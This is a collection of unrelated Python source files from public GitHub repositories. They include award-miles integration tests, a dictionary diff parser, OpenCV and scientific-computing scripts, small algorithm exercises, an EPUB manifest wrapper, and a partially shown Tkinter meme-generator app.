self.assert_that_miles_were_reduced_to(youngest, 10, awarded_miles)\n\n async def test_should_remove_non_expiring_miles_last_when_many_transits(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n self.fixtures.client_has_done_transits(client, 15, self.geocoding_service)\n\n regular_miles: AwardedMiles = self.granted_miles_that_will_expire_in_days(10, 365, self.TODAY, client)\n oldest_non_expiring_miles: AwardedMiles = self.granted_non_expiring_miles(5, self.DAY_BEFORE_YESTERDAY, client)\n\n # when\n with freeze_time(self.DAY_BEFORE_YESTERDAY):\n self.awards_service.remove_miles(client.id, 13)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(regular_miles, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(oldest_non_expiring_miles, 2, awarded_miles)\n\n async def test_should_remove_soon_to_expire_miles_first_when_client_is_vip(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.VIP)\n # and\n\n second_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 10, 60, self.YESTERDAY, client)\n third_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 5, 365, self.DAY_BEFORE_YESTERDAY, client)\n first_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 15, 30, self.TODAY, client)\n non_expiring: AwardedMiles = self.granted_non_expiring_miles(\n 1, self.DAY_BEFORE_YESTERDAY, client)\n\n # when\n with freeze_time(self.DAY_BEFORE_YESTERDAY):\n self.awards_service.remove_miles(client.id, 21)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(non_expiring, 1, awarded_miles)\n self.assert_that_miles_were_reduced_to(first_to_expire, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(second_to_expire, 4, awarded_miles)\n self.assert_that_miles_were_reduced_to(third_to_expire, 5, awarded_miles)\n\n async def test_should_remove_soon_to_expire_miles_first_when_removing_on_sunday_and_client_has_done_many_transits(\n self\n ):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n self.fixtures.client_has_done_transits(client, 15, self.geocoding_service)\n # and\n second_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 10, 60, self.YESTERDAY, client)\n third_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 5, 365, self.DAY_BEFORE_YESTERDAY, client)\n first_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 15, 10, self.TODAY, client)\n non_expiring: AwardedMiles = self.granted_non_expiring_miles(\n 100, self.YESTERDAY, client)\n\n # when\n with freeze_time(self.SUNDAY):\n self.awards_service.remove_miles(client.id, 21)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(non_expiring, 100, awarded_miles)\n self.assert_that_miles_were_reduced_to(first_to_expire, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(second_to_expire, 4, awarded_miles)\n self.assert_that_miles_were_reduced_to(third_to_expire, 5, awarded_miles)\n\n async def test_should_remove_expiring_miles_first_when_client_has_many_claims(self):\n # given\n client = self.client_with_an_active_miles_program(Client.Type.NORMAL)\n # and\n self.fixtures.client_has_done_claim_after_completed_transit(client, 3)\n # and\n second_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 4, 60, self.YESTERDAY, client)\n third_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 10, 365, self.DAY_BEFORE_YESTERDAY, client)\n first_to_expire: AwardedMiles = self.granted_miles_that_will_expire_in_days(\n 5, 10, self.YESTERDAY, client)\n non_expiring: AwardedMiles = self.granted_non_expiring_miles(\n 10, self.YESTERDAY, client)\n\n # when\n with freeze_time(self.YESTERDAY):\n self.awards_service.remove_miles(client.id, 21)\n\n # then\n awarded_miles = self.awards_account_repository.find_all_miles_by(client)\n self.assert_that_miles_were_reduced_to(non_expiring, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(third_to_expire, 0, awarded_miles)\n self.assert_that_miles_were_reduced_to(second_to_expire, 3, awarded_miles)\n self.assert_that_miles_were_reduced_to(first_to_expire, 5, awarded_miles)\n\n def granted_miles_that_will_expire_in_days(\n self,\n miles: int,\n expiration_in_days: int,\n when: datetime,\n client: Client,\n ) -> AwardedMiles:\n self.miles_will_expire_in_days(expiration_in_days)\n self.default_miles_bonus_is(miles)\n return self.miles_registered_at(when, client)\n\n def granted_non_expiring_miles(self, miles: int, when: datetime, client: Client) -> AwardedMiles:\n self.default_miles_bonus_is(miles)\n with freeze_time(when):\n return self.awards_service.register_non_expiring_miles(client.id, miles)\n\n def assert_that_miles_were_reduced_to(\n self,\n first_to_expire: AwardedMiles,\n miles_after_reduction: int,\n all_miles: List[AwardedMiles]\n ):\n actual = list(\n map(\n lambda awarded_miles: awarded_miles.get_miles_amount(datetime.min),\n filter(\n lambda am: first_to_expire.date == am.date\n and first_to_expire.get_expiration_date() == am.get_expiration_date(),\n all_miles\n )\n )\n )\n self.assertEqual(miles_after_reduction, actual[0])\n\n def miles_registered_at(self, when: datetime, client: Client) -> AwardedMiles:\n with freeze_time(when):\n return self.awards_service.register_miles(client.id, self.TRANSIT_ID)\n\n def client_with_an_active_miles_program(self, client_type: Client.Type) -> Client:\n with freeze_time(self.DAY_BEFORE_YESTERDAY):\n client = self.fixtures.a_client_with_type(client_type)\n self.fixtures.active_awards_account(client)\n return client\n\n def miles_will_expire_in_days(self, days: int):\n self.awards_service.app_properties.miles_expiration_in_days = days\n\n async def tearDown(self) -> None:\n drop_db_and_tables()\n\n def default_miles_bonus_is(self, miles: int):\n self.awards_service.app_properties.default_miles_bonus = miles\n","repo_name":"dragarthPl/cabs-python","sub_path":"src/main/tests/integration/test_removing_award_miles_integration.py","file_name":"test_removing_award_miles_integration.py","file_ext":"py","file_size_in_byte":11076,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"2"}
+{"seq_id":"17664420688","text":"def parser_dict(el1, el2):\n result = {}\n # Если сравниваемые значения - словари\n if type(el1) is dict and type(el2) is dict:\n\n keys_el1 = set(el1.keys())\n keys_el2 = set(el2.keys())\n\n children = sorted(keys_el1.union(keys_el2))\n\n for key in children:\n\n if key in keys_el1 and key in keys_el2:\n # Ключи в обоих словарях, ключи равны\n if el1.get(key) == el2.get(key):\n value = convert(el1[key])\n result[key] = {'status': ' ', 'children': value}\n else:\n recurs = parser_dict(convert(el1[key]), convert(el2[key]))\n result[key] = check_children(recurs)\n # Ключ только в первом словаре - удален\n elif key in keys_el1:\n result[key] = {'status': '- ', 'children': convert(el1[key])}\n # Ключ только во втором словаре - добавлен\n else:\n result[key] = {'status': '+ ', 'children': convert(el2[key])}\n # Если сравниваемые значения - разные типы\n else:\n return {'was': convert(el1), 'add': convert(el2)}\n\n return result\n\n\ndef check_children(some_dict):\n if some_dict.get('was') is not None:\n return {'status': 'diff', 'children': some_dict}\n return {'status': ' ', 'children': some_dict}\n\n\ndef convert(obj):\n dictionary = {\n 'False': 'false',\n 'True': 'true',\n 'None': 'null',\n }\n return dictionary.get(str(obj), obj)\n\n\nif __name__ == \"__main__\":\n pass\n # from pprint import pprint\n # from gen_diff.main import open_file\n # from gen_diff.formatter.plain_format import plain\n # from gen_diff.formatter.stylish_format import stylish\n # file1 = open_file(\n # \"/home/dimaevan/Projects/Python/python-project-lvl2/tests/fixtures/complicated/file3.json\")\n # file2 = open_file(\n # \"/home/dimaevan/Projects/Python/python-project-lvl2/tests/fixtures/complicated/file4.json\")\n # answer = parser_dict(file1, file2)\n # pprint(answer)\n # print(stylish(answer))\n","repo_name":"dimaevan/python-project-lvl2","sub_path":"gen_diff/parser/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"37679147888","text":"import numpy as np\nimport cv2 as cv\nfrom analisys_craks import Pic, Settings\n\n# Canny settings\nlow_thr = 35\nhigh_thr = low_thr * 3\napr_size = 3\n\n# Morphology settings\nkernel_3 = np.ones((3, 3), np.uint8)\nkernel_5 = np.ones((5, 5), np.uint8)\n\nimg = cv.imread('sample_2.jpg')\ntest_img = Pic(img)\n\ncanny = cv.Canny(Pic.blur(test_img), low_thr, high_thr, apr_size)\n\n# 1st method: dilate + close + erode\nmorph_img_1 = cv.dilate(canny, kernel_3, iterations=1)\nmorph_img_1 = cv.morphologyEx(morph_img_1, cv.MORPH_CLOSE, kernel_3, iterations=2)\nmorph_img_1 = cv.erode(morph_img_1, kernel_3, iterations=1)\n\n# 2nd method: dilate + open + erode\n# morph_img_2 = cv.dilate(canny, kernel_3, iterations=2)\n# morph_img_2 = cv.morphologyEx(morph_img_2, cv.MORPH_OPEN, kernel_3, iterations=1)\n# morph_img_2 = cv.erode(morph_img_2, kernel_3, iterations=1)\n\nno_canny = cv.morphologyEx(Pic.adapt_thr(test_img), cv.MORPH_OPEN, kernel_3, iterations=1)\n\ncv.imshow('thr', test_img.img)\ncv.imshow('canny', canny)\ncv.imshow('canny+morph', morph_img_1)\ncv.waitKey(0)\ncv.destroyAllWindows()\n","repo_name":"aveegor/VKR_Project","sub_path":"Canny_test.py","file_name":"Canny_test.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"3002651011","text":"import pytest\nfrom seaice import *\nfrom firedrake import PeriodicSquareMesh, SpatialCoordinate, as_vector\n\n\n@pytest.mark.parametrize(\n \"family, theta\", [(a, b) for a in [\"CR\", \"CG\"] for b in [0, 0.5, 1]]\n)\ndef test_vp_transport_model_compile(family, theta):\n timestep = 1\n dumpfreq = 10 ** 3\n timescale = 1\n\n dirname = \"./output/test-output/u.pvd\"\n\n number_of_triangles = 35\n length = 5 * 10 ** 5\n mesh = PeriodicSquareMesh(number_of_triangles, number_of_triangles, length)\n\n x, y = SpatialCoordinate(mesh)\n\n ocean_curr = as_vector(\n [0.1 * (2 * y - length) / length, -0.1 * (length - 2 * x) / length]\n )\n\n ic = {\"u\": 0, \"a\": x / length, \"h\": 1, \"s\": as_vector([[0, 0], [0, 0]])}\n advect = {\"h\": True, \"a\": True}\n stabilised = {\"state\": False, \"alpha\": 1}\n conditions = Conditions(\n family=family,\n ocean_curr=ocean_curr,\n ic=ic,\n advect=advect,\n stabilised=stabilised,\n theta=theta,\n )\n\n timestepping = TimesteppingParameters(timescale=timescale, timestep=timestep)\n output = OutputParameters(dirname=dirname, dumpfreq=dumpfreq)\n solver = SolverParameters()\n params = SeaIceParameters()\n\n vp_transport = ViscousPlasticTransport(\n mesh=mesh,\n conditions=conditions,\n timestepping=timestepping,\n output=output,\n params=params,\n solver_params=solver,\n )\n\n t = 0\n\n while t < timescale - 0.5 * timestep:\n vp_transport.solve(vp_transport.usolver)\n vp_transport.update(vp_transport.w0, vp_transport.w1)\n t += timestep\n\n assert t > 0\n","repo_name":"elma16/floe","sub_path":"tests/test_vp_transport_model_compile.py","file_name":"test_vp_transport_model_compile.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"4595709355","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\n\n\ndef batch_sequence(x, sequence_length=10, num_shift=1):\n num_points = x.shape[0]\n inputs = []\n targets = []\n # for p in np.arange(0, num_points, max(num_shift, sequence_length // 5)):\n for p in np.arange(0, num_points, num_shift):\n # prepare inputs (we're sweeping from left to right in steps sequence_length long)\n if p + sequence_length + num_shift >= num_points:\n break\n\n inputs.append(x[p: p + sequence_length, :])\n targets.append(x[p + sequence_length, :])\n inputs = np.array(inputs)\n targets = np.array(targets)\n idx = np.random.permutation(np.arange(inputs.shape[0]))\n inputs = inputs[idx]\n targets = targets[idx]\n\n return inputs, targets\n\n\ndef plot_final_average_results(linear, nonlinear, nonlinear_lag, save_dir, index):\n ground_truth = np.zeros((5, 5))\n ground_truth[0, 1] = 1\n ground_truth[0, 2] = 1\n ground_truth[0, 3] = 1\n ground_truth[3, 4] = 1\n ground_truth[4, 3] = 1\n\n plt.figure(figsize=(8, 3))\n ax1 = plt.subplot(142)\n ax1.matshow(linear)\n ax1.axis('off')\n ax1.set_title('Linear')\n\n ax2 = plt.subplot(143)\n ax2.matshow(nonlinear)\n ax2.axis('off')\n ax2.set_title('Nonlinear')\n\n ax3 = plt.subplot(144)\n ax3.matshow(nonlinear_lag)\n ax3.axis('off')\n ax3.set_title('Nonlinear lag')\n\n ax4 = plt.subplot(141)\n ax4.matshow(ground_truth)\n ax4.axis('off')\n ax4.set_title('Ground Truth')\n\n plt.savefig(os.path.join(save_dir, str(index).rjust(2, '0') + 'all.png'))\n\n\ndef plot_save_intermediate_results(matrix, mode, index, save_dir):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n ax.matshow(matrix)\n plt.savefig(os.path.join(save_dir, mode + str(index).rjust(2, '0') + '.png'))\n np.savetxt(os.path.join(save_dir, mode + str(index).rjust(2, '0') + '.txt'), matrix)\n","repo_name":"shaozhefeng/RNN-GC","sub_path":"util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"}
+{"seq_id":"40033801551","text":"from input import data\nimport itertools as it\n\n\ndef sol(data, noun=12, verb=2):\n arr = [int(n) for n in data.split(',')]\n arr[1] = noun\n arr[2] = verb\n i = 0\n while True:\n n, a, b, c = arr[i:i+4]\n if n == 99:\n break\n elif n == 1:\n arr[c] = arr[a] + arr[b]\n elif n == 2:\n arr[c] = arr[a] * arr[b]\n else:\n print('weird', n)\n i += 4\n return arr[0]\n\n# part1\nprint(sol(data))\n\n# part2\nfor n, v in it.product(range(100), range(100)):\n if sol(data, n, v) == 19690720:\n print(100*n+v)\n","repo_name":"Skaft/aoc","sub_path":"2019/day2/aoc2.py","file_name":"aoc2.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"33570024843","text":"\ndef dfs(grid,i,j):\n if (i<0 or j <0 or i>=len(grid) or j>=len(grid[0]) or grid[i][j]=='0' ):\n return 0\n grid[i][j]='0'\n dfs(grid,i+1,j)\n dfs(grid,i-1,j)\n dfs(grid,i,j+1)\n dfs(grid,i,j-1)\n return 1\n\ndef numIslands(grid):\n if (grid == None or len(grid) == 0):\n return 0\n numIslands = 0\n for i in range(len(grid)):\n for j in range (len(grid[i])):\n if grid[i][j]=='1':\n numIslands += dfs(grid,i,j)\n return numIslands\n \ngrid = [[\"1\",\"1\",\"1\",\"1\",\"0\"],[\"1\",\"1\",\"0\",\"1\",\"0\"],[\"1\",\"1\",\"0\",\"0\",\"0\"],[\"0\",\"0\",\"0\",\"0\",\"0\"]]\nprint (numIslands(grid)) \n\n\ngrid = [[\"1\",\"1\",\"0\",\"1\"],[\"0\",\"0\",\"1\",\"0\"],[\"0\",\"0\",\"0\",\"0\"]]\nprint (numIslands(grid))","repo_name":"abhilashgcp/python-programs","sub_path":"NumberIslands/NumberIsland.py","file_name":"NumberIsland.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"4428076623","text":"from queue import PriorityQueue\nimport json\n\nwith open('Assignment1.3Graph.json') as f:\n data = json.load(f)\n\n# a\n# /|\\\n# b e c\n# /| / |\n# d f g\n\n#Start and Goal of our Searches \nstart = 'a'\ngoal = 'g'\n\n#Creating our Adjacent List for each Node.\n# def setup_graph(data):\n# graph = {}\n# for node in data['nodes']:\n# grouping = {\"neighbor\":\"allowance\"}\n# for edge in data['edges']:\n# if edge['source'] == node:\n# grouping[\"neighbor\"] = edge['target']\n# grouping[\"allowance\"]= edge['cost']\n# grouping.update()\n\n# if edge['target'] == node:\n# grouping[\"neighbor\"] = edge['target']\n# grouping[\"allowance\"]= edge['cost']\n# grouping.update()\n# graph.update({node:grouping})\n# print(graph)\n# return graph\n\ndef setup_graph(data):\n graph = {}\n for node in data['nodes']:\n grouping={} \n for edge in data['edges']:\n if edge['source'] == node:\n grouping.update({edge['target']:edge['cost' ]} )\n graph.update({node:grouping})\n return graph\nsetup_graph(data) \nadjList = setup_graph(data)\n\n#Using Priority Queue to try and implement uniform cost search\ndef UCS(adjList,start,goal):\n #Creating arrays, queues, sets\n queue = PriorityQueue()\n visited = {}\n level = {}\n parent = {}\n bfs_traversal = []\n path = []\n \n #Initializing our arrays\n for node in adjList.keys():\n visited[node] = False\n parent[node] = None\n level[node] = -1 \n \n visited[start] = True #Initialize our start node as visited\n level[start] = 0 #Initializes our source node level as 0\n queue.put(start) #putting our start node into the queue\n \n #LIFO of queue into our bfs_traversal\n while not queue.empty():\n x = queue.get() #Remove item from queue\n bfs_traversal.append(x) #Adds item last item we got from queue into traversal\n print(bfs_traversal)\n \n for AI in adjList[x]:\n if not visited[AI]:\n visited[AI] = True #Add to Visited\n parent[AI] = x\n level[AI] = level[x] + 1 #Increases level\n queue.put(AI) #Put item on queue\n \n #Create our Shortest Path from Start to Goal\n while goal is not None:\n path.append(goal)\n goal = parent[goal]\n path.reverse() #Reverse our path\n print(path) #Bingo\n \nUCS(adjList,start,goal)\n","repo_name":"Joshua-Newman/Artificial-Intelligence","sub_path":"Uniform-Cost Search/UCS.py","file_name":"UCS.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31392951449","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n__author__ = \"ChenyangGao \"\n__version__ = (0, 1, 1)\n__all__ = [\"OpfWrapper\", \"ManifestItem\", \"SpineItemref\"]\n\nfrom os import PathLike\nfrom typing import AnyStr, Iterator, NamedTuple, Optional, Union\nfrom urllib.parse import quote, unquote\n\nfrom lxml.etree import Element, _Element\n\nfrom util.mapper import Mapper\nfrom util.mimetype import guess_mimetype\nfrom util.makeid import makeid\nfrom util.opfparser import OpfParser\n\n\nSPINE_CONCERNED_MIMES = [\"text/html\", \"application/xhtml+xml\"]\n\n\nclass ManifestItem(NamedTuple):\n id: str\n href: str\n bookpath: str\n media_type: str = \"application/octet-stream\"\n properties: Optional[str] = None\n fallback: Optional[str] = None\n media_overlay: Optional[str] = None\n\n\nclass SpineItemref(NamedTuple):\n idref: str\n id: Optional[str] = None\n linear: Optional[str] = None\n properties: Optional[str] = None\n\n\nclass OpfWrapper(OpfParser):\n\n def __init__(self, ebook_root: AnyStr | PathLike[AnyStr] = \"\"):\n super().__init__(ebook_root)\n\n # Invert key dictionaries to allow for reverse access\n self.id_to_bookpath = Mapper((id, self.id_to_bookpath(id)) for id in self.manifest_map)\n self.href_to_id = Mapper((self.id_to_href(id), id) for id in self.manifest_map)\n self.bookpath_to_id = Mapper((self.id_to_bookpath(id), id) for id in self.manifest_map)\n\n def has(\n self, \n id: Optional[str] = None, \n href: Optional[str] = None, \n bookpath: Optional[str] = None, \n ) -> bool:\n if id is not None:\n return id in self.manifest_map\n elif href is not None:\n return href in self.href_to_id\n elif bookpath is not None:\n return href in self.bookpath_to_id\n return False\n\n def get(\n self, \n id: Optional[str] = None, \n href: Optional[str] = None, \n bookpath: Optional[str] = None, \n ) -> ManifestItem:\n if id is not None:\n pass\n elif href is not None:\n try:\n id = self.href_to_id(href)\n except KeyError as e:\n raise ValueError(\n f\"href {href!r} does not exist in manifest!\") from e\n elif bookpath is not None:\n try:\n id = self.bookpath_to_id(bookpath)\n except KeyError as e:\n raise KeyError(\n f\"Bookpath {bookpath!r} does not exist in manifest!\") from e\n else:\n raise ValueError(\"Give (not None) at least one of arguments: \"\n \"id, href or bookpath\")\n\n item = self.manifest_map[id]\n return ManifestItem(\n id = id, \n href = self.id_to_href(id), \n bookpath = self.id_to_bookpath(id), \n media_type = item.get(\"media-type\", \"application/octet-stream\"), \n properties = item.get(\"properties\"), \n fallback = item.get(\"fallback\"), \n media_overlay = item.get(\"media-overlay\"), \n )\n\n def add(\n self, \n path: Union[None, AnyStr, PathLike[AnyStr]] = None, \n bookpath: Optional[str] = None, \n href: Optional[str] = None, \n id: Optional[str] = None, \n media_type: Optional[str] = None, \n properties: Optional[dict] = None, \n fallback: Optional[str] = None, \n media_overlay: Optional[str] = None, \n ) -> ManifestItem:\n if path is not None:\n bookpath = self.path_to_bookpath(path)\n href = self.bookpath_to_href(bookpath)\n elif bookpath is not None:\n href = self.bookpath_to_href(bookpath)\n elif href is not None:\n bookpath = self.href_to_bookpath(href)\n else:\n raise ValueError(\"Give (not None) at least one of arguments: \"\n \"path, bookpath or href\")\n\n if id is None:\n id = makeid(href, bookpath, self.manifest_map.keys())\n elif id in self.manifest_map:\n raise ValueError(f\"Id {id} is already exist in manifest\")\n\n if media_type is None:\n media_type = guess_mimetype(href)\n if media_type is None:\n raise ValueError(\"Unable to determine media-type (media_type)\")\n\n attrib = {\"id\": id, \"href\": quote(href, \":/#\"), \"media-type\": media_type}\n if properties is not None:\n attrib[\"properties\"] = properties\n if fallback is not None:\n attrib[\"fallback\"] = fallback\n if media_overlay is not None:\n attrib[\"media-overlay\"] = media_overlay\n el = Element(\"item\", attrib)\n self.manifest.append(el)\n self.manifest_map[id] = el\n item = ManifestItem(\n id = id, \n href = href, \n bookpath = bookpath, \n media_type = media_type, \n properties = properties, \n fallback = fallback, \n media_overlay = media_overlay, \n )\n self.id_to_bookpath[id] = bookpath\n self.href_to_id[href] = id\n self.bookpath_to_id[bookpath] = id\n\n if media_type in SPINE_CONCERNED_MIMES:\n el = Element(\"itemref\", {\"idref\": id})\n self.spine.append(el)\n self.spine_map[id] = el\n\n return item\n\n def delete(\n self, \n id: Optional[str] = None, \n href: Optional[str] = None, \n bookpath: Optional[str] = None, \n ) -> ManifestItem:\n item = self.get(id, href, bookpath)\n\n el = self.manifest_map.pop(item.id)\n self.manifest.remove(el)\n\n del self.id_to_bookpath[item.id]\n del self.href_to_id[item.href]\n del self.bookpath_to_id[item.bookpath]\n\n if item.id in self.spine_map:\n el = self.spine_map.pop(item.id)\n self.spine.remove(el)\n\n return item\n\n def gettocid(self):\n # To find the manifest id of toc.ncx\n return next((\n id for id, item in self.manifest_map.items()\n if item.get(\"media-type\") == \"application/x-dtbncx+xml\"\n ), None)\n\n def getpagemapid(self):\n # To find the manifest id of page-map.xml\n return next((\n id for id, item in self.manifest_map.items()\n if item.get(\"media-type\") == \"application/oebs-page-map+xml\"\n ), None)\n\n def getnavid(self):\n # To find the manifest id of nav.xhtml\n if self.epub < \"3.0\":\n return None\n return next((\n id for id, item in self.manifest_map.items()\n if item.get(\"media-type\") == \"application/xhtml+xml\"\n and \"nav\" in item.get(\"properties\", \"\")\n ), None)\n\n def manifest_iter(self) -> Iterator[ManifestItem]:\n yield from map(self.get, self.manifest_map)\n\n def text_iter(self) -> Iterator[ManifestItem]:\n spine_map = self.spine_map\n for id, item in self.manifest_map.items():\n if id in spine_map and spine_map[id].get(\"linear\") != \"no\" or \\\n item.get(\"media-type\") in (\"text/html\", \"application/xhtml+xml\"):\n yield self.get(id)\n\n def spine_iter(self) -> Iterator[SpineItemref]:\n for idref, itemref in self.spine_map.items():\n yield SpineItemref(\n idref=idref, \n id=itemref.get(\"id\"), \n linear=itemref.get(\"linear\"), \n properties=itemref.get(\"properties\"), \n )\n\n","repo_name":"ChenyangGao/epub-toolset","sub_path":"cmdlineTools/watch_epub/watch_epub/util/opfwrapper.py","file_name":"opfwrapper.py","file_ext":"py","file_size_in_byte":7552,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"2"}
+{"seq_id":"7352531558","text":"import _thread\nfrom concurrent.futures import thread\nimport threading\nfrom tkinter import *\nfrom tkinter import filedialog\nimport tkinter\nfrom tkinter import ttk\nfrom tkinter.tix import IMAGETEXT\nfrom turtle import left, right\nimport cv2 as theEngine\nimport random\nimport numpy as np\nfrom urllib.request import urlopen\nimport urllib.request\nimport requests\nfrom matplotlib import pyplot as plt\nimport scipy.spatial as spatial\nfrom PySide6.QtWidgets import QApplication, QWidget, QPushButton, QLabel as qt\nimport sys\nfrom tkinter import *\nfrom PIL import Image, ImageTk, ImageSequence\nimport urllib3\nfrom itertools import count, cycle\n\n#Setup for the main variables that host all the individual parts such as inputs and buttons\nthumbnail_resolution = (640,360)\ntext = ''\napp = Tk()\napp.title(\"Generate Memez\")\ntimes = 0\ntabOwner = ttk.Notebook(master = app)\ntab1 = Frame(tabOwner)\ntab2 = Frame(tabOwner)\ntabOwner.add(tab1, text = \"Generator\")\ntabOwner.add(tab2, text=\"User Input\")\ntabOwner.grid(row=0,column=0,sticky=\"ew\")\nlabel = Label(tab1, image= '')\n\n#Next is for the main Dwayne Johnson Photo to keep the GUI look decent\nimageFinish = ImageTk.PhotoImage(Image.open(\"6j39t1.jpg\"))\n\nlabel.config(image=imageFinish)\nlabel.grid(row=0, column=2, pady=2)\n\nentryLabel = Label(tab1, text= 'How Many Clickbait Arrows? (Default=1): ')\nentryLabel.grid(row=1,column=2, pady=2)\n\nnumOfArrows = Entry(tab1, width= 20)\nnumOfArrows.grid(row=2,column=2,pady=2)\n\n#This next part is the same layout, but for the user input section\nlabel2 = Label(tab2,image = '')\nlabel2.config(image=imageFinish)\nlabel2.grid(row=0, column=2)\n\nentryLabel2 = Label(tab2, text= 'How Many Clickbait Arrows? (Default=1): ')\nentryLabel2.grid(row=1,column=2, pady=2)\n\nnumOfArrows2 = Entry(tab2, width= 20)\nnumOfArrows2.grid(row=2,column=2,pady=2)\n\nwhatText = Label(tab2,text = \"What Text Shall Da Meme Display My Lord?\\nType \\\"GENERATE\\\" if you wish to generate text\")\nwhatText.grid(row=3,column=2,pady=2)\n\ntextEntry = Entry(tab2,width=20)\ntextEntry.grid(row=4,column=2,pady=2)\n\nwhatImage = Label(tab2,text=\"Please Upload the meme image\")\nwhatImage.grid(row=5,column=2,pady=2)\n\nclass userInput:\n \n def runGIF(fileName,fileName2):\n lbl = ImageLabel(tab2)\n lbl2 = ImageLabel(tab2)\n lbl2.load(fileName2,False) \n lbl2.grid(row=0, column=3, pady=2)\n lbl.load(fileName,False)\n lbl.grid(row=0,column=1,pady=1)\n userInput.hitTheGriddy()\n return\n \n #Method made to orgnaize all the parts to be centered through the grid method\n def hitTheGriddy(self):\n label2.grid(row=0, column=2,pady=2)\n entryLabel2.grid(row=1,column=2, pady=4)\n whatText.grid(row=3,column=2,pady=2)\n textEntry.grid(row=4,column=2,pady=2)\n whatImage.grid(row=5,column=2,pady=2)\n \n \n \n def userUploadImage(self):\n global times\n \n #Sets up and asks user to upload their image\n filetypes =(('JPEG File', '*.jpg'),('PNG File', '*.png'))\n userImage = theEngine.imread(filedialog.askopenfile(filetypes=filetypes).name)\n arrows = 1\n \n try:\n arrows = int(numOfArrows2.get())\n except:\n print('')\n pass\n text = textEntry.get()\n if(text==\"GENERATE\"):\n text = makingImage.get_text()\n else:\n text = textEntry.get()\n saveBtn = Button (tab2, text = \"Save the Image Bro\", command = makingImage.saveFile, width = 20)\n saveBtn.grid(row=7,column=2,pady=2)\n #times is to reset the image display and ensure that the current image is what is saved via the button\n if times >0:\n label.config(image='') \n saveBtn.destroy() \n label.grid(row=0, column=1, pady=2)\n \n #Firstly, the image is cropped in accord with the predetermined resolution earlier\n cropped_img = makingImage.crop_image(userImage)\n \n\n #Find the densest region of keypoints in the ORB Algorithm\n #Then we create a circle around that area and save it to an image\n densest = makingImage.get_densest(makingImage.get_kp(cropped_img)) \n print('Densest Point is at: ' + str(densest))\n \n #This draws an arrow that points to the circle, further employing the randomness that is expected\n circled_img = makingImage.draw_shapes(cropped_img, densest,arrows)\n \n x_length = circled_img.shape[1]\n #Setup for the font and then put the text on an image with the circle\n txt_scale, txt_height = makingImage.get_font_scale(makingImage.get_text(), x_length)\n if densest[1][0] > circled_img.shape[0] / 2:\n pos = (0, txt_height + int(.07 * circled_img.shape[0]))\n else:\n pos = (0, + circled_img.shape[0] - int(.07 * circled_img.shape[0])) \n line_width = txt_scale * 3\n txted_img = theEngine.putText(circled_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (0, 0 ,0), int(line_width * 4), theEngine.LINE_AA)\n txted_img = theEngine.putText(circled_img, text, pos, theEngine.FONT_HERSHEY_DUPLEX, txt_scale, (255, 255, 255), int(line_width), theEngine.LINE_AA)\n \n \n blue,green,red = theEngine.split(txted_img)\n firstStep = theEngine.merge((red,green,blue))\n secondStep= Image.fromarray(firstStep)\n global saveImage \n saveImage= secondStep\n imageFin = ImageTk.PhotoImage(image = secondStep)\n label2.config(image=imageFin)\n print(\"Configged Image\")\n label2.grid(row=0, column=3, pady=2)\n times+=1\n userInput.runGIF(\"frog_left.gif\",\"frog_right.gif\")\n tab2.config(bg='blue')\n app.mainloop()\n \n def gifTab2(self):\n userInput.userUploadImage()\n makingImage.runGIF(\"frog_left.gif\",\"frog_right.gif\")\n \n \n \nclass ImageLabel(tkinter.Label):\n \n \"\"\"\n A Label that displays images, and plays them if they are gifs\n :im: A PIL Image instance or a string filename\n \"\"\"\n def load(self, im,definer):\n \n if isinstance(im, str):\n im = Image.open(im)\n frames = []\n \n try:\n for i in count(1):\n frames.append(ImageTk.PhotoImage(im.copy()))\n im.seek(i)\n except EOFError:\n pass\n self.frames = cycle(frames)\n \n try:\n self.delay = im.info['duration']\n except:\n self.delay = 100\n \n if len(frames) == 1:\n self.config(image=next(self.frames))\n else:\n self.next_frame()\n \n def unload(self):\n self.config(image=None)\n self.frames = None\n \n 